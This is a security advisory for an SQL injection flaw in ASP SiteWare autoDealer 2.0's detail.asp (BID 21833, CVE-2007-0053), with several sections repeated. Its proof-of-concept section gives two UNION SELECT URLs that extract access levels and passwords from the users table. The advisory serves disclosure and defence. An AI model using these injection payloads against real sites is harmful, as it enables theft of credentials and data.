autoDealer Detail.ASP SQL Injection Vulnerability
BID:21833
Info
autoDealer Detail.ASP SQL Injection Vulnerability
| Bugtraq ID: | 21833 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0053 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 01 2007 12:00AM |
| Updated: | Jul 30 2007 11:25PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
ASP SiteWare autoDealer 2.0 |
| Not Vulnerable: | |
Discussion
autoDealer Detail.ASP SQL Injection Vulnerability
The autoDealer application is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
autoDealer 2.0 is vulnerable to this issue; other versions may also be affected.
The autoDealer application is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
autoDealer 2.0 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
autoDealer Detail.ASP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following examples are available to demonstrate this issue:
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users
An attacker can exploit this issue via a web client.
The following examples are available to demonstrate this issue:
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users
Solution / Fix
autoDealer Detail.ASP SQL Injection Vulnerability
Solution:
The vendor has released an update to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has released an update to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
References
autoDealer Detail.ASP SQL Injection Vulnerability
References:
References:
- autoDealer Product Page (ASP SiteWare)